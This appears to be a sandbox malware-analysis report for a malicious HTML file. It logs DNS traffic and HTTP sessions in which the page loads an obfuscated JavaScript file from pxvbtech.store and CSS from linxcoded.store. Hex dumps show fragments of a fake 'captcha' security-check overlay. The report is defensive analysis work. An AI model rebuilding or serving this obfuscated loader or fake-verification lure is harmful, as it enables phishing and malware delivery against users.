TLSH:	BFB3BF03C741E8EB948E7679BBDF190E8C2003957F4E4998726AD98B0539A7D3E01B8D
File Content Preview:	<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <style>. /* rsdGXcObrCaSLbb /. { margin: 0; padding: 0; box-sizing: border-box; }. body, html { width: 100%; height: 100%; }. </style>. <script>. d

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 17:12:40.128690004 CET	53	54231	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:40.192863941 CET	53	51438	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:40.679872990 CET	56047	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:40.680021048 CET	54827	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:40.693413973 CET	53	54827	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:40.694000006 CET	53	56047	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:41.714534044 CET	53	60099	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:41.904793978 CET	55690	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:41.904952049 CET	64989	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:41.911773920 CET	53	55690	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:41.911958933 CET	53	64989	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:42.119239092 CET	51288	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:42.119508028 CET	49626	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:42.120723009 CET	54652	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:42.120932102 CET	54981	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:42.132600069 CET	53	54652	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:42.136951923 CET	53	54981	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:42.141976118 CET	53	49626	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:42.146135092 CET	53	51288	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:43.538141966 CET	53	50228	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:44.769399881 CET	52715	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:44.769550085 CET	51249	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:44.772747993 CET	53	54374	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:44.776438951 CET	53	52715	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:44.776906967 CET	53	51249	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:45.514030933 CET	61857	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:45.514477968 CET	61292	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:45.521303892 CET	53	61857	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:45.521720886 CET	53	61292	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:45.572011948 CET	57779	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:45.572437048 CET	60536	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:45.580324888 CET	53	60536	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:45.580338955 CET	53	57779	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:46.938565969 CET	62357	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:46.938883066 CET	56429	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:46.945796967 CET	53	62357	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:46.946150064 CET	53	56429	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:50.537666082 CET	138	138	192.168.2.4	192.168.2.255
Feb 25, 2025 17:12:52.880851030 CET	53	54337	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:56.848656893 CET	49374	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:56.848809004 CET	54367	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:56.861305952 CET	53	49374	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:56.862328053 CET	53	54367	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:57.775525093 CET	62408	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:57.775726080 CET	61083	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:57.782397985 CET	53	62408	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:57.783364058 CET	53	61083	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:58.401959896 CET	57779	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:58.402091980 CET	63494	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:12:58.409250975 CET	53	57779	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:58.409535885 CET	53	63494	1.1.1.1	192.168.2.4
Feb 25, 2025 17:12:58.778773069 CET	53	64880	1.1.1.1	192.168.2.4
Feb 25, 2025 17:13:17.711457014 CET	53	58828	1.1.1.1	192.168.2.4
Feb 25, 2025 17:13:40.061984062 CET	53	53671	1.1.1.1	192.168.2.4
Feb 25, 2025 17:13:40.111988068 CET	53	64237	1.1.1.1	192.168.2.4
Feb 25, 2025 17:13:41.967549086 CET	62514	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:13:41.967677116 CET	64408	53	192.168.2.4	1.1.1.1
Feb 25, 2025 17:13:41.974715948 CET	53	62514	1.1.1.1	192.168.2.4
Feb 25, 2025 17:13:41.975038052 CET	53	64408	1.1.1.1	192.168.2.4
Feb 25, 2025 17:14:10.150758982 CET	53	64904	1.1.1.1	192.168.2.4
Feb 25, 2025 17:14:54.822954893 CET	53	50628	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:41 UTC	494	OUT	GET /xtk/xls/x1t2k.js HTTP/1.1 Host: pxvbtech.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:42 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Mon, 24 Feb 2025 20:24:50 GMT accept-ranges: bytes content-length: 57098 date: Tue, 25 Feb 2025 16:12:41 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:12:42 UTC	16105	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 7b 76 61 72 20 5f 30 78 32 63 36 64 64 61 3d 5f 30 78 32 63 36 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 66 38 34 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 66 38 34 39 37 38 2c 5f 30 78 33 38 30 36 62 64 29 7b 5f 30 78 66 38 34 39 37 38 3d 5f 30 78 66 38 34 39 37 38 2d 30 78 31 30 65 3b 76 61 72 20 5f 30 78 35 37 34 61 31 65 3d 5f 30 78 32 63 36 64 64 61 5b 5f 30 78 66 38 34 39 37 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 35 37 34 61 31 65 3b 7d 2c 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 3b 7d 76 61 72 20 5f 30 78 31 32 32 62 33 66 3d 5f 30 78 66 38 34 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 62 Data Ascii: function _0xf849(_0x398b93,_0x41161a){var _0x2c6dda=_0x2c6d();return _0xf849=function(_0xf84978,_0x3806bd){_0xf84978=_0xf84978-0x10e;var _0x574a1e=_0x2c6dda[_0xf84978];return _0x574a1e;},_0xf849(_0x398b93,_0x41161a);}var _0x122b3f=_0xf849;(function(_0x20b
2025-02-25 16:12:42 UTC	16384	IN	Data Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 61 70 74 63 68 61 2d 66 75 6c 6c 73 63 72 65 65 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 66 69 78 65 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 31 30 30 76 68 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 3a 5c 78 32 30 77 68 69 74 65 3b 5c 78 30 Data Ascii: x20\x20\x20\x20.captcha-fullscreen\x20{\x0a\x20\x20\x20\x20position:\x20fixed;\x0a\x20\x20\x20\x20top:\x200;\x0a\x20\x20\x20\x20left:\x200;\x0a\x20\x20\x20\x20width:\x20100%;\x0a\x20\x20\x20\x20height:\x20100vh;\x0a\x20\x20\x20\x20background:\x20white;\x0
2025-02-25 16:12:42 UTC	16384	IN	Data Raw: 6e 65 65 64 5c 78 32 30 74 6f 5c 78 32 30 72 65 76 69 65 77 5c 78 32 30 74 68 65 5c 78 32 30 73 65 63 75 72 69 74 79 5c 78 32 30 6f 66 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 5c 78 32 30 62 65 66 6f 72 65 5c 78 32 30 70 72 6f 63 65 65 64 69 6e 67 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 6f 74 65 72 5c 78 32 32 3e 50 65 72 66 6f 72 6d 61 6e 63 65 5c 78 32 30 26 61 6d 70 3b 5c 78 32 30 53 65 63 75 72 69 74 79 3c 2f 64 69 76 3e 5c 78 30 61 Data Ascii: need\x20to\x20review\x20the\x20security\x20of\x20your\x20connection\x20before\x20proceeding.\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20<div\x20class=\x22footer\x22>Performance\x20&\x20Security</div>\x0a
2025-02-25 16:12:42 UTC	8225	IN	Data Raw: 31 37 3d 5f 30 78 31 62 37 31 31 39 3b 5f 30 78 33 64 61 64 37 35 28 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 32 30 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 31 33 29 5d 28 7b 27 6c 65 66 74 27 3a 27 30 27 2c 27 6f 70 61 63 69 74 79 27 3a 27 68 69 64 65 27 7d 2c 30 78 30 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 62 32 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 31 33 29 5d 28 7b 27 6c 65 66 74 27 3a 27 30 27 2c 27 6f 70 61 63 69 74 79 27 3a 5f 30 78 32 61 34 65 31 37 28 30 78 31 33 33 29 7d 2c 30 78 36 34 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 38 32 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 35 33 29 5d 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 61 36 29 29 3b 7d 7d 29 3b 7d 29 2c 24 28 5f 30 78 35 35 39 66 66 Data Ascii: 17=_0x1b7119;_0x3dad75(),$(_0x2a4e17(0x120))[_0x2a4e17(0x113)]({'left':'0','opacity':'hide'},0x0),$(_0x2a4e17(0x1b2))[_0x2a4e17(0x113)]({'left':'0','opacity':_0x2a4e17(0x133)},0x64),$(_0x2a4e17(0x182))[_0x2a4e17(0x153)](_0x2a4e17(0x1a6));}});}),$(_0x559ff

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:42 UTC	354	OUT	GET /xtk/xls/x1t2k.js HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:43 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Mon, 24 Feb 2025 20:24:50 GMT accept-ranges: bytes content-length: 57098 date: Tue, 25 Feb 2025 16:12:43 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:12:43 UTC	16105	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 7b 76 61 72 20 5f 30 78 32 63 36 64 64 61 3d 5f 30 78 32 63 36 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 66 38 34 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 66 38 34 39 37 38 2c 5f 30 78 33 38 30 36 62 64 29 7b 5f 30 78 66 38 34 39 37 38 3d 5f 30 78 66 38 34 39 37 38 2d 30 78 31 30 65 3b 76 61 72 20 5f 30 78 35 37 34 61 31 65 3d 5f 30 78 32 63 36 64 64 61 5b 5f 30 78 66 38 34 39 37 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 35 37 34 61 31 65 3b 7d 2c 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 3b 7d 76 61 72 20 5f 30 78 31 32 32 62 33 66 3d 5f 30 78 66 38 34 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 62 Data Ascii: function _0xf849(_0x398b93,_0x41161a){var _0x2c6dda=_0x2c6d();return _0xf849=function(_0xf84978,_0x3806bd){_0xf84978=_0xf84978-0x10e;var _0x574a1e=_0x2c6dda[_0xf84978];return _0x574a1e;},_0xf849(_0x398b93,_0x41161a);}var _0x122b3f=_0xf849;(function(_0x20b
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 61 70 74 63 68 61 2d 66 75 6c 6c 73 63 72 65 65 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 66 69 78 65 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 31 30 30 76 68 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 3a 5c 78 32 30 77 68 69 74 65 3b 5c 78 30 Data Ascii: x20\x20\x20\x20.captcha-fullscreen\x20{\x0a\x20\x20\x20\x20position:\x20fixed;\x0a\x20\x20\x20\x20top:\x200;\x0a\x20\x20\x20\x20left:\x200;\x0a\x20\x20\x20\x20width:\x20100%;\x0a\x20\x20\x20\x20height:\x20100vh;\x0a\x20\x20\x20\x20background:\x20white;\x0
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 6e 65 65 64 5c 78 32 30 74 6f 5c 78 32 30 72 65 76 69 65 77 5c 78 32 30 74 68 65 5c 78 32 30 73 65 63 75 72 69 74 79 5c 78 32 30 6f 66 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 5c 78 32 30 62 65 66 6f 72 65 5c 78 32 30 70 72 6f 63 65 65 64 69 6e 67 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 6f 74 65 72 5c 78 32 32 3e 50 65 72 66 6f 72 6d 61 6e 63 65 5c 78 32 30 26 61 6d 70 3b 5c 78 32 30 53 65 63 75 72 69 74 79 3c 2f 64 69 76 3e 5c 78 30 61 Data Ascii: need\x20to\x20review\x20the\x20security\x20of\x20your\x20connection\x20before\x20proceeding.\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20<div\x20class=\x22footer\x22>Performance\x20&\x20Security</div>\x0a
2025-02-25 16:12:43 UTC	8225	IN	Data Raw: 31 37 3d 5f 30 78 31 62 37 31 31 39 3b 5f 30 78 33 64 61 64 37 35 28 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 32 30 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 31 33 29 5d 28 7b 27 6c 65 66 74 27 3a 27 30 27 2c 27 6f 70 61 63 69 74 79 27 3a 27 68 69 64 65 27 7d 2c 30 78 30 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 62 32 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 31 33 29 5d 28 7b 27 6c 65 66 74 27 3a 27 30 27 2c 27 6f 70 61 63 69 74 79 27 3a 5f 30 78 32 61 34 65 31 37 28 30 78 31 33 33 29 7d 2c 30 78 36 34 29 2c 24 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 38 32 29 29 5b 5f 30 78 32 61 34 65 31 37 28 30 78 31 35 33 29 5d 28 5f 30 78 32 61 34 65 31 37 28 30 78 31 61 36 29 29 3b 7d 7d 29 3b 7d 29 2c 24 28 5f 30 78 35 35 39 66 66 Data Ascii: 17=_0x1b7119;_0x3dad75(),$(_0x2a4e17(0x120))[_0x2a4e17(0x113)]({'left':'0','opacity':'hide'},0x0),$(_0x2a4e17(0x1b2))[_0x2a4e17(0x113)]({'left':'0','opacity':_0x2a4e17(0x133)},0x64),$(_0x2a4e17(0x182))[_0x2a4e17(0x153)](_0x2a4e17(0x1a6));}});}),$(_0x559ff

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:42 UTC	520	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: linxcoded.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:43 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Tue, 04 Mar 2025 16:12:43 GMT content-type: text/css last-modified: Mon, 27 Jan 2025 19:21:00 GMT accept-ranges: bytes content-length: 258966 date: Tue, 25 Feb 2025 16:12:43 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:12:43 UTC	16032	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 36 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 Data Ascii: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6; order: 6 }
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 31 3b 0d Data Ascii: : 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12; -ms-flex-order: 11;
2025-02-25 16:12:43 UTC	15252	IN	Data Raw: 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e Data Ascii: ntext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .input-group-sm>.input-group-appen
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 32 63 63 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 63 62 66 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e Data Ascii: .disabled):active, .show>.btn-primary.dropdown-toggle { color: #fff; background-color: #0062cc; border-color: #005cbf } .btn-primary:not(:disabled):not(.disabled).active:focus, .btn-primary:not(:disabled):n
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 2e 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 2e 64 69 73 61 62 6c 65 64 2c 0d 0a 20 20 20 20 2e 62 74 Data Ascii: ound-color: transparent; border-color: transparent } .btn-link.focus, .btn-link:focus { text-decoration: underline; border-color: transparent; box-shadow: none } .btn-link.disabled, .bt
